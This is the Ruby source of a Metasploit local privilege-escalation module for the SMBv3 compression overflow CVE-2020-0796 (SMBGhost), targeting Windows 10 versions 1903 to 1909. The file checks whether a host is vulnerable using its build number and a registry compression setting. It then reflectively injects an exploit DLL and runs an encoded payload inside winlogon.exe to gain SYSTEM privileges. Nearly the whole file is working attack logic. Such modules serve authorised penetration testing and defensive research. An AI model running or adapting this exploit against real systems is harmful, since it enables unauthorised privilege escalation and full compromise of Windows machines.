## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, { 'Name' => 'SMBv3 Compression Buffer Overflow', 'Description' => %q{ A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself before injecting a payload into winlogon.exe. }, 'License' => MSF_LICENSE, 'Author' => [ 'Daniel García Gutiérrez', # original LPE exploit 'Manuel Blanco Parajón', # original LPE exploit 'Spencer McIntyre' # metasploit module ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Targets' => [ # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ], [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ] ], 'Payload' => { 'DisableNops' => true }, 'References' => [ [ 'CVE', '2020-0796' ], [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ], [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ] ], 'DisclosureDate' => '2020-03-13', 'DefaultTarget' => 0, 'Notes' => { 'AKA' => [ 'SMBGhost', 'CoronaBlue' ], 'Stability' => [ CRASH_OS_RESTARTS, ], 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION, ], 'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ] } } ) ) end def check if session.platform != 'windows' # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end version = get_version_info vprint_status("Windows Build Number = #{version.build_number}") # see https://docs.microsoft.com/en-us/windows/release-information/ unless version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_1909) print_error('The exploit only supports Windows 10 versions 1903 - 1909') return CheckCode::Safe end disable_compression = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters', 'DisableCompression') if !disable_compression.nil? && disable_compression != 0 print_error('The exploit requires compression to be enabled') return CheckCode::Safe end CheckCode::Appears end def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') end print_status('Reflectively injecting the exploit DLL and executing it...') # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. encoded_payload = payload.encoded execute_dll( ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll'), [encoded_payload.length].pack('I<') + encoded_payload ) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end